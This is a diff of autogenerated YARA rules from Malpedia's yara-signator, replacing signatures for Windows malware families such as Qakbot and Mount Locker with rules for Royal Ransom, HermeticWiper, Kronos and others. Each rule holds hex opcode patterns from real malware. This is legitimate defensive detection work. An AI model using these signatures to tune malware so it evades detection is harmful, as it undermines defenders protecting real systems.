tags = "FILE" @@ -170676,30 +173528,32 @@ rule MALPEDIA_Win_Mikoponi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b0f 51 e8???????? 83c404 5d 5f 83c408 } - $sequence_1 = { e8???????? 83c404 eb15 8d942464020000 52 8d442418 } - $sequence_2 = { 33ed 391d???????? 743d bf???????? } - $sequence_3 = { b9???????? 66895010 c7004418a150 e8???????? 8d3c47 } - $sequence_4 = { 53 55 e8???????? 83c40c 84c0 7506 83c3ff } - $sequence_5 = { 803d????????01 56 7527 8b742408 56 ff15???????? } - $sequence_6 = { e8???????? 81c470040000 c3 8b542430 3b542420 750e } - $sequence_7 = { 7543 3805???????? 753b 8d8c2464020000 51 68???????? } + $sequence_0 = { 7410 83ff01 755d 8bcb } + $sequence_1 = { ff15???????? 33ff 0fb60437 50 } + $sequence_2 = { 75f5 2bd1 8d8db4fdffff d1fa 8d7102 } + $sequence_3 = { 50 e8???????? 83c40c ff15???????? 33d2 b910270000 } + $sequence_4 = { 83ff01 755d 8bcb e8???????? } + $sequence_5 = { 50 ff15???????? 8bf0 ff15???????? 85c0 7518 } + $sequence_6 = { 83ff01 755d 8bcb e8???????? 3bc7 } + $sequence_7 = { 99 b9a0860100 f7f9 81c2f8240100 52 ff15???????? } + $sequence_8 = { 7560 8d85b4fdffff 68???????? 50 } + $sequence_9 = { ff15???????? 8d442454 50 ff15???????? 50 } condition: - 7 of them and filesize <330752 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Hunter_Auto : FILE +rule MALPEDIA_Win_Royal_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a2ce8975-358a-5feb-855e-0c18799189f7" + id = "03d0866a-b258-5731-ad57-bc4b0e928885" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hunter_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.royal_ransom_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "4840112788d43f80efa44bf4553c38cceb240b146b43c82ea7ba535d388455f9" + logic_hash = "05d0adf9ccc7ed8f53f566dd8191bfd8d7450964340be8e2ce8cbced72447263" score = 75 quality = 75 tags = "FILE" @@ -170713,32 +173567,32 @@ rule MALPEDIA_Win_Hunter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4323 03c8 8d83b5000000 038d3cffffff 03c8 8d83ae000000 03ce } - $sequence_1 = { 8b5f08 8b440104 8945f0 8b13 8bc8 e8???????? 85c0 } - $sequence_2 = { 8d4b38 0faf4dbc 898d34fdffff 8b8d1cffffff 0fafce 8d7375 898d8cfeffff } - $sequence_3 = { 8bf9 6b1f14 8b743b0c eb38 0fbf0475080f4700 83f8c2 7433 } - $sequence_4 = { 8b4c2440 6aff e8???????? 59 8b4c2448 33c0 89442424 } - $sequence_5 = { 53 6a68 5a e8???????? 83c40c b208 8bce } - $sequence_6 = { 8b4630 8b14b8 85d2 7405 e8???????? b980000000 e8???????? } - $sequence_7 = { c3 51 56 57 8bf1 33c0 8b7e1c } - $sequence_8 = { 8b4614 89442418 85c0 750c 385c2431 7506 885c2430 } - $sequence_9 = { 8d8d04f8ffff e9???????? 8d8d1cf8ffff e9???????? 8d8de0feffff e9???????? 8d8d34f8ffff } + $sequence_0 = { 752f e8???????? 4c8d05d60c1400 ba8b010000 488d0d320c1400 e8???????? 4533c0 } + $sequence_1 = { e9???????? 2bc3 488d0d2df4dfff 488b8ce9d02c2d00 8064f93dfd f7d8 1ac0 } + $sequence_2 = { e8???????? 33c0 e9???????? 488b4820 e8???????? 85c0 0f8497020000 } + $sequence_3 = { e8???????? 488d4e24 448bc8 4c8d0579a80d00 ba09000000 e8???????? 488bcb } + $sequence_4 = { 8bc2 896c2444 418bfe 83fa02 7d3e e8???????? 4c8d05e7a90f00 } + $sequence_5 = { 488d1507b51300 41b893040000 e8???????? 41b894040000 488d15efb41300 488bcf e8???????? } + $sequence_6 = { e8???????? baa6000000 4c89742420 4c8bcd 4c8d05f3a80e00 8d4a93 e8???????? } + $sequence_7 = { 754a e8???????? 4c8d054e820d00 baa2000000 488d0df2810d00 e8???????? 4533c0 } + $sequence_8 = { b828000000 e8???????? 482be0 488d15fc4fffff 488d0d5de62000 e8???????? 33c9 } + $sequence_9 = { e8???????? 85c0 7437 488d05297a0000 4c89742430 4889442428 4c8d0d485c0e00 } condition: - 7 of them and filesize <1056768 + 7 of them and filesize <6235136 } -rule MALPEDIA_Win_Cadelspy_Auto : FILE +rule MALPEDIA_Win_Eyservice_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4b5e300d-757a-5fee-8d04-bdd6cbf72a64" + id = "e6b201c5-31f5-59a2-a52d-309e470fcb5a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cadelspy_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.eyservice_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "7f3bdf0fe810a37a01bcc3fbdfdc1fe97ab8b02a604549fa04a7da715441b0c6" + logic_hash = "a8d5ae517d0720536deb96b397532bb33ed4fe4db40da33e37b572e015c805c7" score = 75 quality = 75 tags = "FILE" @@ -170752,32 +173606,32 @@ rule MALPEDIA_Win_Cadelspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? c7042408020000 33f6 56 ff7514 e8???????? 83c40c } - $sequence_1 = { e8???????? 68???????? 8d9c2464020000 e8???????? 6828020000 } - $sequence_2 = { 46 66833e5c 74f8 8bc6 8d5002 } - $sequence_3 = { 59 59 85c0 7524 837d8c05 } - $sequence_4 = { ff15???????? ff75fc 8bd8 ff15???????? 5e 8bc3 5b } - $sequence_5 = { 57 33ff 893a 8d4802 668b30 40 } - $sequence_6 = { 8b0c8d004c0110 83e01f c1e006 8d440124 } - $sequence_7 = { 741b 8b07 8bc8 c1f905 83e01f c1e006 8b0c8d004c0110 } - $sequence_8 = { 8d442418 50 e8???????? eb0b 50 } - $sequence_9 = { 7507 e8???????? eb5f 57 8b7d08 85ff 750a } + $sequence_0 = { c1f802 3bf0 72da eb22 8b0d???????? 2b0d???????? c1f902 } + $sequence_1 = { 6a01 6a01 68???????? ffd6 83c410 8d542410 52 } + $sequence_2 = { 83bef800000000 747c 8d4c2408 e8???????? a1???????? 8d4c2408 51 } + $sequence_3 = { 6808020000 8d8e34020000 51 e8???????? 85c0 7c1e } + $sequence_4 = { 83c404 8bc8 e8???????? 8bf0 8bce e8???????? 8b4f10 } + $sequence_5 = { e8???????? b901000000 66894f08 5f 5e 5d 8d410d } + $sequence_6 = { 68???????? 8d542418 52 ff15???????? 85c0 754f 88442414 } + $sequence_7 = { 50 03f7 56 e8???????? 8b4c2420 83c410 5f } + $sequence_8 = { a3???????? e8???????? 6a06 68???????? 56 a3???????? } + $sequence_9 = { 85c0 7459 66837d005c 7452 66837c24145c 754a } condition: - 7 of them and filesize <204800 + 7 of them and filesize <452608 } -rule MALPEDIA_Win_Mount_Locker_Auto : FILE +rule MALPEDIA_Win_Kronos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6832e6a1-eaa1-5e1c-99c0-2c5304573141" + id = "8d31fd16-d4f2-5a2a-96ec-ac39493ba957" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mount_locker_auto.yar#L1-L152" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kronos_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "bff6076907046250738924c00fe6ba5da63e4a09d46fe90acd3aa54210bff35b" + logic_hash = "9add781f31640b82e44b92fb87f47ac9fbcee8b3e1525e4790235c25c58c2848" score = 75 quality = 75 tags = "FILE" @@ -170791,38 +173645,32 @@ rule MALPEDIA_Win_Mount_Locker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 81f900000780 7503 0fb7c0 3d2e050000 } - $sequence_1 = { f30f5905???????? 0f5ad0 66490f7ed0 e8???????? } - $sequence_2 = { 4d8bc8 4c8bc2 4c8bf2 8bf1 } - $sequence_3 = { 8bc8 81e10000ffff 81f900000780 7503 } - $sequence_4 = { 488b0b 41b902000000 4533c0 33d2 } - $sequence_5 = { 488d4df0 4889442428 4533c9 4533c0 } - $sequence_6 = { 488bcb 488b15???????? e8???????? 85c0 } - $sequence_7 = { 488364242000 4533c9 488b4c2458 33d2 c744243001000000 c744243c02000000 } - $sequence_8 = { 4c8bf2 8bf1 33d2 33c9 } - $sequence_9 = { ff15???????? 85c0 7509 f0ff05???????? } - $sequence_10 = { b905000000 ff15???????? 3d040000c0 7494 85c0 } - $sequence_11 = { 7505 e8???????? 833d????????00 7409 833d????????00 } - $sequence_12 = { 8d442430 68???????? 50 ffd7 } - $sequence_13 = { a1???????? 83f804 7515 68???????? } - $sequence_14 = { 8bf0 85f6 7424 6800010000 } - $sequence_15 = { ff15???????? 85c0 7409 f0ff05???????? eb1e 56 } + $sequence_0 = { 8d542450 52 03c6 50 57 ffd3 85c0 } + $sequence_1 = { 813e50450000 7549 57 56 ff75fc e8???????? 8b450c } + $sequence_2 = { e8???????? 33db 6a40 8d4628 53 50 } + $sequence_3 = { e8???????? 85db 0f854fffffff eb1c 8d4dd0 be02000000 e8???????? } + $sequence_4 = { 897804 8930 ff461c 6a00 } + $sequence_5 = { 803d????????01 56 750f 33f6 8d4df0 e8???????? 8bc6 } + $sequence_6 = { eb1d 8b0f e8???????? 8b0f 8b30 6a04 e8???????? } + $sequence_7 = { 0355dc 8b45e8 2b45ec 03ca 3b450c 7356 29450c } + $sequence_8 = { c3 55 8bec 83ec5c 56 8d45a4 50 } + $sequence_9 = { 3b7104 7505 8b06 894104 3b7108 7506 8b5604 } condition: - 7 of them and filesize <368640 + 7 of them and filesize <1302528 } -rule MALPEDIA_Win_Redyms_Auto : FILE +rule MALPEDIA_Win_Navrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "da0046e8-7d1d-55ff-bc47-8c4a49be473c" + id = "267e4534-59a3-5746-9f05-524cfafc2ef1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redyms_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.navrat_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "5d36da1238e7bd61b571d2194e775b3f30f76bd59bc3908f725087cbecb38f2e" + logic_hash = "d02406512a8ed4f24033286c28dfca048100e2bb166bb80aa3e9acab2e4b74d3" score = 75 quality = 75 tags = "FILE" @@ -170836,32 +173684,32 @@ rule MALPEDIA_Win_Redyms_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 32d8 80f3fb 8819 40 41 6683f805 72ee } - $sequence_1 = { 8b4604 50 6a00 ffd3 50 ffd7 56 } - $sequence_2 = { 33c5 8945fc 56 8b35???????? 8d4ddc 8bd1 } - $sequence_3 = { 85f6 0f84e4000000 8b3d???????? 8d4de8 8bd1 33c0 } - $sequence_4 = { a1???????? 33c5 8945fc 56 c785ccfeffff04010000 7203 } - $sequence_5 = { c745d000000000 ff15???????? 5f 85c0 } - $sequence_6 = { 7417 8b45f4 8b4df8 50 51 56 ff15???????? } - $sequence_7 = { 8b4608 8b4e04 50 6a00 e8???????? 83c408 } - $sequence_8 = { 83c8ff 5b 8be5 5d c3 8bc6 5f } - $sequence_9 = { 8d5828 53 8945fc ffd7 83caff 8bc6 f00fc110 } + $sequence_0 = { 0fbec0 83e847 c3 8d48d0 80f909 } + $sequence_1 = { 56 68???????? 50 8d85f0feffff 8bf1 50 } + $sequence_2 = { f7de 1bf6 f7de 56 68???????? } + $sequence_3 = { 8bf0 f7de 1bf6 f7de 56 } + $sequence_4 = { 0fbec0 83e847 c3 8d48d0 80f909 7707 } + $sequence_5 = { 7707 0fbec0 83c004 c3 3c2b 7503 } + $sequence_6 = { c3 3c2f 0f95c0 fec8 2440 fec8 } + $sequence_7 = { 85f6 7407 8b7608 83461c02 } + $sequence_8 = { c745dc726f736f c745e066745c57 c745e4696e646f c745e877735c43 c745ec75727265 c745f06e745665 } + $sequence_9 = { 51 56 50 57 a3???????? ff15???????? 57 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Oceansalt_Auto : FILE +rule MALPEDIA_Win_Tinyfluff_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4759a01e-4dff-5857-b87f-609205da91fe" + id = "68615fcb-8e02-5dda-b945-ad2728dc7f08" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oceansalt_auto.yar#L1-L173" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinyfluff_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "5f4a1382e32af57ddc08356072f34b4511a1cb8b2d1541817fa2debd46a6df75" + logic_hash = "7b6f89788f810db3773be969b0bf83c7846502ce63a8bb1297c4bbad49f7e342" score = 75 quality = 75 tags = "FILE" @@ -170875,40 +173723,34 @@ rule MALPEDIA_Win_Oceansalt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 6a00 6a02 83f81f } - $sequence_1 = { 8d95fcfbffff 6800020000 52 e8???????? 83c410 8d85ecfbffff } - $sequence_2 = { 8d85f4feffff 50 56 ffd7 6a00 } - $sequence_3 = { 6a00 52 c685fcfbffff00 e8???????? } - $sequence_4 = { 8b7508 33c0 50 8945f5 668945f9 8845fb 6a07 } - $sequence_5 = { 8945fc 56 57 6a00 6a02 c785ccfdffff28010000 e8???????? } - $sequence_6 = { 6a0d 58 5d c3 8b04cd2cf04000 } - $sequence_7 = { 56 c645f400 ff15???????? 6a00 6a07 8d4df4 } - $sequence_8 = { 4885c0 7419 488d1573750000 488bc8 ff15???????? } - $sequence_9 = { b903000000 f3a6 0f8463010000 33c9 0fb6840c8c000000 } - $sequence_10 = { 33d2 41b82a010000 6689442440 e8???????? ff15???????? 8be8 } - $sequence_11 = { 33c0 e9???????? 48895c2408 4c63c1 488d1d1d890000 4d8bc8 } - $sequence_12 = { 0f85d0000000 488d0d6b380000 ff15???????? 488bf0 4885c0 0f848c010000 } - $sequence_13 = { 488bc8 c744242800000008 c744242003000000 ff15???????? 488bd8 4883f8ff } - $sequence_14 = { f3a6 749a 488d8c24b0030000 33d2 41b868010000 e8???????? } - $sequence_15 = { 488d3d94700000 eb0e 488b03 4885c0 7402 ffd0 4883c308 } + $sequence_0 = { 0f84982c0000 c3 833d????????ff 7503 33c0 c3 53 } + $sequence_1 = { 8b04bd50704100 03c1 885c302e 46 3bf2 } + $sequence_2 = { 83e03f c1f906 6bc038 03048d50704100 } + $sequence_3 = { 85c0 7418 8b858cfbffff 85c0 7407 50 } + $sequence_4 = { ff15???????? 33f6 e9???????? 8d8de0fbffff 8d5102 668b01 83c102 } + $sequence_5 = { 8b049550704100 57 8b7d10 897d98 8955b4 } + $sequence_6 = { 83c410 ebe6 8b45f0 8b0c8550704100 8b45f8 807c012800 } + $sequence_7 = { 50 6af6 ff15???????? 8b04bd50704100 834c0318ff 33c0 } + $sequence_8 = { 56 57 83781408 8bf9 8bf2 897dfc 8bd0 } + $sequence_9 = { c1fa06 8934b8 8bc7 83e03f 6bc838 8b049550704100 8b440818 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Lurk_Auto : FILE +rule MALPEDIA_Win_Plead_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "67fdecf6-fece-5b5e-aa84-6821eaa887bc" + id = "fd5a06dc-6983-5a74-97bc-98455f57d710" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lurk_auto.yar#L1-L180" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plead_auto.yar#L1-L235" license_url = "N/A" - logic_hash = "1d68cad8f119a971efeb0a8c788b3983d9ce03607f838f5c4c4d29840d917af1" + logic_hash = "6a7ab17d07de8a4ca9e1e2599ef78a9a501e90d23119efee05ad014354df9153" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -170920,40 +173762,48 @@ rule MALPEDIA_Win_Lurk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff7508 ff15???????? 8b35???????? 50 ff7508 } - $sequence_1 = { 8b4508 5b 5f 5e c9 c3 55 } - $sequence_2 = { 8b4d08 8b5110 83c201 8b4508 895010 8b4dac 51 } - $sequence_3 = { f3a5 66a5 33db 395d08 } - $sequence_4 = { 72cc 33c9 8bc1 99 6a0b 5f f7ff } - $sequence_5 = { c1ee03 33ce eb0e c1e60b 33ce 8bf0 c1ee05 } - $sequence_6 = { 59 3bc7 7534 0fbe4203 } - $sequence_7 = { 8b3d???????? 33f6 bb24080000 53 6a40 8975ec } - $sequence_8 = { ff750c 83ceff ff7508 ff7510 e8???????? 83c418 85c0 } - $sequence_9 = { ff750c 57 ff15???????? 85c0 7411 395dfc 750c } - $sequence_10 = { 68???????? 8d85ecfeffff 50 ff15???????? 8d85ecfeffff 50 } - $sequence_11 = { ebf8 56 8bf0 33c0 85d2 8bca 740c } - $sequence_12 = { 8945fc 8b4d10 8b91a4000000 8955f8 837df800 7661 } - $sequence_13 = { c9 c3 55 8bec 81ec08010000 6a35 6a40 } - $sequence_14 = { 744d 56 8d4508 50 } - $sequence_15 = { 83f866 7567 3bf0 7563 0fbe4205 50 e8???????? } + $sequence_0 = { ff15???????? 85c0 750c c745fcfcffffff e9???????? 395d18 } + $sequence_1 = { ebda 33f6 c745fcf8ffffff 3bf7 } + $sequence_2 = { bf00800000 57 53 56 897d14 } + $sequence_3 = { e8???????? 817d14e8030000 53 56 } + $sequence_4 = { 59 5e c20400 8b4c2404 56 } + $sequence_5 = { 50 ff15???????? 6a3f 33c0 59 } + $sequence_6 = { 8d4dfc 51 8d4dd8 51 } + $sequence_7 = { 8d4514 53 50 56 53 6a05 } + $sequence_8 = { ff15???????? 50 ff15???????? 33c0 81c418020000 } + $sequence_9 = { 5e 5b 33c0 81c418020000 c21000 8b84241c020000 } + $sequence_10 = { 7cf1 ffd3 8b35???????? 2bc7 3de8030000 } + $sequence_11 = { 8b5508 52 ff15???????? 6aff a1???????? 50 ff15???????? } + $sequence_12 = { 50 8b1d???????? ffd3 85c0 743b } + $sequence_13 = { 8b8c241c020000 68???????? 51 ff15???????? } + $sequence_14 = { 5d 8a44341c 32c2 8844341c 46 3bf1 } + $sequence_15 = { c705????????01000000 ff15???????? 8b1d???????? ffd3 8bf8 33f6 8bcf } + $sequence_16 = { 648b1530000000 8b520c 8b521c 8b5a08 } + $sequence_17 = { 8b430c 034510 6a04 6800100000 51 50 } + $sequence_18 = { 8d7a08 e8???????? 52 e8???????? e9???????? 0fb755e0 83fa08 } + $sequence_19 = { e8???????? b02c aa 8b4510 85c0 } + $sequence_20 = { 33c0 f3aa eb10 e8???????? 8b4314 034508 } + $sequence_21 = { 8b5324 f7c200000002 7412 6800400000 8b4310 50 } + $sequence_22 = { e8???????? 0fb64de2 8b55ec 8b7df0 8b07 } + $sequence_23 = { b940000000 50 e2fd 56 394510 747e } condition: - 7 of them and filesize <5316608 + 7 of them and filesize <8224768 } -rule MALPEDIA_Win_Qakbot_Auto : FILE +rule MALPEDIA_Win_Hermeticwiper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "241bd352-128e-5f57-a961-1a32ff520127" + id = "ea8155d0-2aad-5127-b709-49a3ac0a065b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qakbot_auto.yar#L1-L449" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermeticwiper_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "9011c5853a3a4bce7115bdec7dfc8cc7a3dbd683d5e3bd577fb86bb5ca62af81" + logic_hash = "152c562a196a1884f9736d7ace893f74c52047d602608c8f019348b6a2233130" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -170965,75 +173815,32 @@ rule MALPEDIA_Win_Qakbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c9 c3 55 8bec 81ecc4090000 } - $sequence_1 = { 33c0 7402 ebfa e8???????? } - $sequence_2 = { 7402 ebfa 33c0 7402 } - $sequence_3 = { 7402 ebfa eb06 33c0 } - $sequence_4 = { e8???????? 33c9 85c0 0f9fc1 41 } - $sequence_5 = { 50 e8???????? 8b06 47 59 } - $sequence_6 = { 8d45fc 6aff 50 e8???????? } - $sequence_7 = { 59 59 33c0 7402 } - $sequence_8 = { e8???????? 59 59 6afb e9???????? } - $sequence_9 = { 740d 8d45fc 6a00 50 } - $sequence_10 = { 50 8d8534f6ffff 6a00 50 e8???????? } - $sequence_11 = { 8945fc e8???????? 8bf0 8d45fc 50 e8???????? } - $sequence_12 = { 33c0 e9???????? 33c0 7402 } - $sequence_13 = { 7402 ebfa e9???????? 6a00 } - $sequence_14 = { 8975f8 8975f0 8975f4 e8???????? } - $sequence_15 = { eb0b c644301c00 ff465c 8b465c 83f840 7cf0 } - $sequence_16 = { 7cef eb10 c644301c00 ff465c 8b465c 83f838 } - $sequence_17 = { e8???????? 83c410 33c0 7402 } - $sequence_18 = { 85c0 750a 33c0 7402 } - $sequence_19 = { c644061c00 ff465c 837e5c38 7cef eb10 c644301c00 } - $sequence_20 = { 7507 c7466401000000 83f840 7507 } - $sequence_21 = { 837dfc00 750b 33c0 7402 } - $sequence_22 = { e8???????? e8???????? 33c0 7402 } - $sequence_23 = { 833d????????00 7508 33c0 7402 } - $sequence_24 = { c7466001000000 33c0 40 5e } - $sequence_25 = { 7402 ebfa 837d1000 7408 } - $sequence_26 = { 80ea80 8855f0 e8???????? 0fb64df7 } - $sequence_27 = { 50 8d45d8 50 8d45d4 50 8d45ec } - $sequence_28 = { 56 e8???????? 8b45fc 83c40c 40 } - $sequence_29 = { 6a00 6800600900 6a00 ff15???????? } - $sequence_30 = { 50 ff5508 8bf0 59 } - $sequence_31 = { 6a00 58 0f95c0 40 50 } - $sequence_32 = { 57 ff15???????? 33c0 85f6 0f94c0 } - $sequence_33 = { 750c 57 ff15???????? 6afe 58 } - $sequence_34 = { c3 33c9 3d80000000 0f94c1 } - $sequence_35 = { 6a02 ff15???????? 8bf8 83c8ff } - $sequence_36 = { 50 e8???????? 6a40 8d4590 } - $sequence_37 = { 8d85e4fcffff 50 8d85e4fdffff 50 } - $sequence_38 = { 56 e8???????? 83c40c 8d4514 50 } - $sequence_39 = { e8???????? 6a00 8d45d4 50 68???????? } - $sequence_40 = { 5d c3 33c9 66890c46 } - $sequence_41 = { 8b4a04 83c204 03f0 85c9 75e1 } - $sequence_42 = { 01f1 898424a8000000 899424ac000000 8d8424b4000000 89c2 8db424c4000000 } - $sequence_43 = { 8a442417 8b4c2410 0485 88440c66 89ca 83c201 } - $sequence_44 = { ffd3 85ff 741b 6808020000 6a00 } - $sequence_45 = { 88442401 894c245c 0f847afdffff e9???????? } - $sequence_46 = { 89442410 884c2417 eb94 55 89e5 31c0 } - $sequence_47 = { 8945fc 8b4518 53 8b5d10 56 8945c4 } - $sequence_48 = { 8b742420 81c638a1e7c3 39f0 89442410 894c240c 89542408 7408 } - $sequence_49 = { 8b74242c bb3c13b648 f7e3 69f63c13b648 01f2 89442428 8954242c } - $sequence_50 = { 8b4c2444 ffd1 83ec08 b901000000 ba66000000 31ff 89c3 } - $sequence_51 = { 89e0 89580c bb04000000 895808 8b5c246c 895804 8b9c2480000000 } - $sequence_52 = { 8bf0 83c40c 85f6 0f84f8000000 a1???????? } + $sequence_0 = { b9???????? 8bc7 6690 668b10 663b11 751e 6685d2 } + $sequence_1 = { 8bf8 85ff 7404 3bfe 750b 33c0 } + $sequence_2 = { 55 8bec 8b4508 ff30 ff15???????? 6803000280 } + $sequence_3 = { 8b0d???????? 83e802 7408 83e801 751b 8b7e08 } + $sequence_4 = { 8b75f8 13550c 6a00 6a00 52 50 56 } + $sequence_5 = { 33f6 660fd645dc 33ff 8975f4 50 0f1145bc } + $sequence_6 = { d3e0 8b4dfc 0facd605 c1ea05 8504b1 754e 8b4d14 } + $sequence_7 = { 7509 3b75d8 7504 8bc2 eb0f 3bcb } + $sequence_8 = { c20c00 813f46494c45 75d4 f6471601 74ce 0fb77714 } + $sequence_9 = { ebba f7d0 23c6 8b75e0 89048e 41 } condition: - 7 of them and filesize <4883456 + 7 of them and filesize <247808 } -rule MALPEDIA_Win_Bluenoroff_Auto : FILE +rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c5a8ede1-c77a-5a4b-899a-3e41c1e4e510" + id = "6545d5ce-704c-5c00-a6cd-ec1b5c909576" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bluenoroff_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mosaic_regressor_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "65b6fe6298815292c6af264e82e027897f56c9c87e000fed42924fa12c98e75b" + logic_hash = "73c7fd14f8effd7ac9e0816b586de74eff8d0d21c8391e8e84f2921e57196fdb" score = 75 quality = 75 tags = "FILE" @@ -171047,34 +173854,34 @@ rule MALPEDIA_Win_Bluenoroff_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83f802 750e 8d95fcfffeff 52 68???????? } - $sequence_1 = { 8d8df8feffff 51 ff15???????? 0fbe95f8feffff 68???????? } - $sequence_2 = { 85f6 743a 8d85fcfffeff 50 } - $sequence_3 = { 894e04 e8???????? 83c40c 5f } - $sequence_4 = { eb10 85c0 7514 8d85fcfffeff 50 68???????? } - $sequence_5 = { 83feff 7433 8d4e01 51 6a40 } - $sequence_6 = { 68ffff0000 50 e8???????? 33c0 } - $sequence_7 = { 56 6a10 68???????? e8???????? 83c410 813ed0c0b0a0 } - $sequence_8 = { 33ff 53 ff15???????? 8b450c 85c0 7402 } - $sequence_9 = { 50 0fb785f4fffeff 51 52 } + $sequence_0 = { e8???????? 670010 386700 1023 d18a0688078a } + $sequence_1 = { 8975e0 8db1d0a70010 8975e4 eb2a } + $sequence_2 = { 85c0 7456 8b4de0 8d0c8de0b70010 8901 8305????????20 } + $sequence_3 = { f3a4 6a1c 8d8c2480060000 51 6a00 ffd5 8d842478060000 } + $sequence_4 = { 8d442460 50 6a00 ffd5 8d442458 48 8d4900 } + $sequence_5 = { 895008 8d542458 52 88480c } + $sequence_6 = { c744241444000000 8bc8 90 8a10 } + $sequence_7 = { 6a06 89430c 8d4310 8d89c4a70010 5a } + $sequence_8 = { 8bff 55 8bec 8b4508 ff34c578a10010 ff15???????? 5d } + $sequence_9 = { 6a00 6a00 6a00 8d942498080000 } condition: - 7 of them and filesize <303104 + 7 of them and filesize <113664 } -rule MALPEDIA_Win_Vobfus_Auto : FILE +rule MALPEDIA_Win_Gibberish_Auto : FILE { meta: 